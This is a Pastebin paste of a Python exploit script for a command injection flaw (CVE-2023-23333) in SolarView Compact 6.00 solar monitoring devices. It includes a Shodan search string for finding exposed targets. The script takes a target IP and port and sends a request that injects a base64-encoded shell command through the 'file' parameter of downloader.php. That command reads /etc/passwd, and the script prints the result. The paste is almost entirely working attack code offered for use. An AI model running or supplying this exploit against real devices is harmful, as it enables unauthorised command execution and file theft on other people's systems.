Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #- Exploit Title: SolarView Compact 6.00 - Command Injection
- #- Shodan Dork: http.html:"solarview compact"
- #- Exploit Author: ByteHunter
- #- Email: 0xByteHunter@proton.me
- #- Version: 6.00
- #- Tested on: 6.00
- #- CVE : CVE-2023-23333
- import argparse
- import requests
- def vuln_check(ip_address, port):
- url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
- response = requests.get(url)
- if response.status_code == 200:
- output = response.text
- if "root" in output:
- print("Vulnerability detected: Command Injection possible.")
- print(f"passwd file content:\n{response.text}")
- else:
- print("No vulnerability detected.")
- else:
- print("Error: Unable to fetch response.")
- def main():
- parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ")
- parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)
- parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int)
- args = parser.parse_args()
- ip_address = args.ip
- port = args.port
- vuln_check(ip_address, port)
- if __name__ == "__main__":
- main()
Add Comment
Please, Sign In to add comment
